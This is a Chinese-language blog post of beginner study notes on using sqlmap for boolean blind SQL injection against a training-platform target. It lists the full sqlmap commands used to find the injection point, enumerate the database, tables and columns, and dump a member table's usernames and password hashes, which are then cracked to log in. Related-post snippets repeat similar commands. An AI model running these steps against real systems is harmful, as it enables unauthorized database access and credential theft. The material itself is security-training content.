sqlmap注入(布尔盲注)

最新推荐文章于 2024-06-12 08:30:00 发布
最新推荐文章于 2024-06-12 08:30:00 发布
阅读量8.1k 收藏 21
点赞数 6
文章标签: 信息安全 渗透 sql注入 sqlmap学习 kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43355651/article/details/103113853
版权

本人小白 仅仅作为学习笔记 希望通过一次次的记录可以一次次的成长 

sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞

使用墨者学院的靶机进行测试  这里我们使用的是SQL注入漏洞测试(布尔盲注)

通过滚动条找到注入点

然后我们使用的是kali下的工具sqlmap 

 sqlmap -u http://219.153.49.228:46473/new_list.php?id=1

然后我们直接爆出数据库名字

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 --current -db

 爆出数据库名字为 stormgroup

然后报表名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup --tables

爆出两个表  mumber notice

然后爆出表下的列名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup  -T member --columns

这里爆出一个name 一个password 也就是我们需要的

然后我们爆出密码和用户名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup  -T member -C name,password --dump

然后去百度md5解密可以得到第二个密码可以登录 

完成。

 

 

 

 

 

 

 

Z0安全
关注
  • 6
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqlmap注入实操(一)
inslight的博客
09-10 427
基础操作语句 一、检测注入点是否可用 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" 如果有若干询问语句,可添加一个参数 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --batch 二、暴库 1.数据库名称 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --dbs 三、web当前使用的数据库 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --current -db 四、web服务器使用的
SQLmap注入工具
09-20
1)基于布尔盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报错注入...
SQL注入之路之二:布尔型(boolean)盲注_sqlmap布尔盲注
2401_84970106的博客
05-13 758
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入布尔盲注
秋水的博客
08-31 5796
布尔盲注简介 简介及使用场景: 在刚开始接触一个概念时,我们很容易顾名思义,所以在学习盲注之前的一段时间,着实不清楚盲注到底是什么。 我的理解中盲注的本质就是,在页面无法给我提供回显的时候的一中继续注入的手段。那什么是布尔盲注呢?在我们输入and 1或者and 0,浏览器返回给我们两个不同的页面,而我们就可以根据返回的页面来判断正确的数据信息。 相关函数 length()函数: ...
SQL注入sqlmap布尔盲注payload解析
无名J0kзr的博客
10-07 3859
难受 占坑明天更
SQL注入——布尔盲注和时间盲注
m0_69151365的博客
02-16 767
在这两种注入方法里我们可以发现布尔盲注和时间盲注的区别只是在与判断命令是否执行成功的条件不同,整体思路是一样的,包括在第10关中,判断条件变成了图片,而我们只需要在脚本中更改相应的判断条件即可,sqlmap工具同样可以使用。整体来说盲注都是一样的,不一样的只是判断语句是否执行成功的条件而已。
网安入门05-Sql注入布尔盲注&SqlMap
m0_61499194的博客
12-13 1064
常规:python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" --tables -D security
SQL注入-布尔盲注
acepanhuan的博客
02-10 1691
学习SQL注入方法之盲注
sql注入-布尔盲注
WolvenSec的博客
06-02 1258
布尔盲注(Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行解释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔盲注或其他的注入思想突破。
CTFHUB-SQL注入-布尔盲注
weixin_68416970的博客
06-12 665
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
SqlMap注入软件
03-29
3. **多种注入技术**:SqlMap支持多种注入技术,包括时间盲注、基于布尔盲注、联合查询注入等,几乎涵盖了所有已知的SQL注入方式。 4. **数据提取**:一旦发现注入点,SqlMap可以读取、修改、删除甚至控制数据库...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
sqlmap注入详解文档
06-30
### SQLMap注入详解知识点 #### 一、SQLMap概述 - **定义与功能**:SQLMap是一款免费且开源的渗透测试工具,专为自动化检测和利用SQL注入漏洞而设计,并进一步接管数据库服务器。该工具拥有强大的检测引擎以及一...
Sqlmap 注入神器 支持各种sql注入
04-03
- 自动化检测:Sqlmap能够自动检测目标是否存在SQL注入漏洞,包括基于错误的注入、基于时间的注入、基于布尔盲注等多种类型。 - 数据提取:一旦发现注入点,Sqlmap可以提取数据库中的表名、列名以及数据内容。 ...
java毕业作品-JAVA技术在《堡垒》手机游戏开发中的应用与探索(源代码+论文)
最新发布
08-03
java毕业作品_JAVA技术在《堡垒》手机游戏开发中的应用与探索(源代码+论文)
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入 刷之前备份原bios避免翻车
08-03
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入。刷之前备份原bios避免翻车
第5章 传输层 计算机网络思维导图,结合学习通作业
08-03
计算机网络思维导图,结合学习通作业,方便备考复习。
sqlmap使用布尔盲注的命令
04-18
SQLMap是一款常用的自动化SQL注入工具,可以帮助安全测试人员发现和利用Web应用程序中的SQL注入漏洞。在使用SQLMap进行布尔盲注时,可以使用以下命令: 1. 基本命令: ``` python sqlmap.py -u <目标URL> --data "<POST数据>" --cookie "<Cookie数据>" --level <注入等级> --risk <注入风险等级> ``` 其中,`<目标URL>`是要测试的目标网址,`<POST数据>`是POST请求的数据,`<Cookie数据>`是请求中的Cookie信息,`<注入等级>`和`<注入风险等级>`是指定注入的等级和风险等级。 2. 布尔盲注命令: ``` python sqlmap.py -u <目标URL> --data "<POST数据>" --cookie "<Cookie数据>" --level <注入等级> --risk <注入风险等级> --technique B ``` 在基本命令的基础上,通过添加`--technique B`参数来指定使用布尔盲注的技术。 以上是使用SQLMap进行布尔盲注的基本命令,你可以根据实际情况进行参数的调整和配置。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值